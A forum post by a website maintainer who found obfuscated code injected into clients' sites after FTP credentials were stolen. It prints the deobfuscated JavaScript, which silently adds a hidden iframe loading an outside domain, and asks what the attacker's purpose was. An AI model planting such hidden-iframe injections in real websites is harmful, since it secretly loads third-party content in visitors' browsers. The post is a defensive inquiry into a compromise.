I recently discoverd some evil code in some of my clients websites. These snippets where PHP-based and JS-based and were injected because a trojan-virus logged some ftp-credentials. However, the code was obfuscated and as I eval’d it (safely), it looks like this:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src','http://www.bahnmotive.de/index.htm');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

As you can see, the URL bahnmotive.de is included in the page as in invisible iframe. This website does not contain any harmful data (at least not today anymore), so I ask myself (and you): Why should someone link to a site in an invisible iframe and not doing some other evil things? My first guess is, that there is a SEO-Agency which promised a lot of traffic on their clients website bahnmotive.de and accomplished that because of this trojan-virus.
Could that be? I did a research in Google, but found nothing about this, so I wanted to ask some of the pro’s here. Perhaps you can point me to another forum where this topic can be discussed.